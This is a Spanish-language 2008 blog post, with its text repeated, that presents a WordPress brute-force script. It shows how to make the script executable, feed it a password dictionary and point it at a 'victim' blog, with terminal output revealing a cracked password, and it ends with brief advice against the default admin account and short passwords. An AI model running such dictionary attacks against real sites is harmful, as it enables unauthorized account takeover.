24th Sep 2008
Fuerza Bruta a blogs Wordpress
Zerialkiller pone a disposición nuestra un script que por fuerza bruta permite obtener el password de los blogs montados sobre wordpress.
Lo descargamos y le damos permisos de ejecución.
chmod +x wp-bruteforce
Nos hacemos de un diccionario de palabras y lo renombramos como bf_passwords. Ahora ejecutamos el script y nos pedirá la dirección de la victima.
lesthack@lesthack-laptop:~$ ./wp-bruteforcer
.::Wordpress BruteForce By 0x90::.
use a good dictioary rename it to bf_passwords
Enter website with full path to wordpress:
> http://blogwordpress.com/
trying password
trying password !
trying password !
trying password !!
trying password !!2004
trying password !@#$%
...
...
Bengo WebSite http://blogwordpress.com/ password is: 02032
Have Fun 
Una forma de protegernos es no utilizar la cuenta por default llamada admin, y si lo hacemos, establecer un password de una longitud mayor a 12 caracteres, incluyendo letras, números y símbolos.
Via: ZerialKiller
Zerialkiller pone a disposición nuestra un script que por fuerza bruta permite obtener el password de los blogs montados sobre wordpress.
Lo descargamos y le damos permisos de ejecución.
chmod +x wp-bruteforce
Nos hacemos de un diccionario de palabras y lo renombramos como bf_passwords. Ahora ejecutamos el script y nos pedirá la dirección de la victima.
lesthack@lesthack-laptop:~$ ./wp-bruteforcer .::Wordpress BruteForce By 0x90::. use a good dictioary rename it to bf_passwords Enter website with full path to wordpress: > http://blogwordpress.com/ trying password trying password ! trying password ! trying password !! trying password !!2004 trying password !@#$% ... ... Bengo WebSite http://blogwordpress.com/ password is: 02032 Have Fun
Una forma de protegernos es no utilizar la cuenta por default llamada admin, y si lo hacemos, establecer un password de una longitud mayor a 12 caracteres, incluyendo letras, números y símbolos.
Via: ZerialKiller
Posted in bash, codigos, enlaces, hacking, programacion | 2 Comments »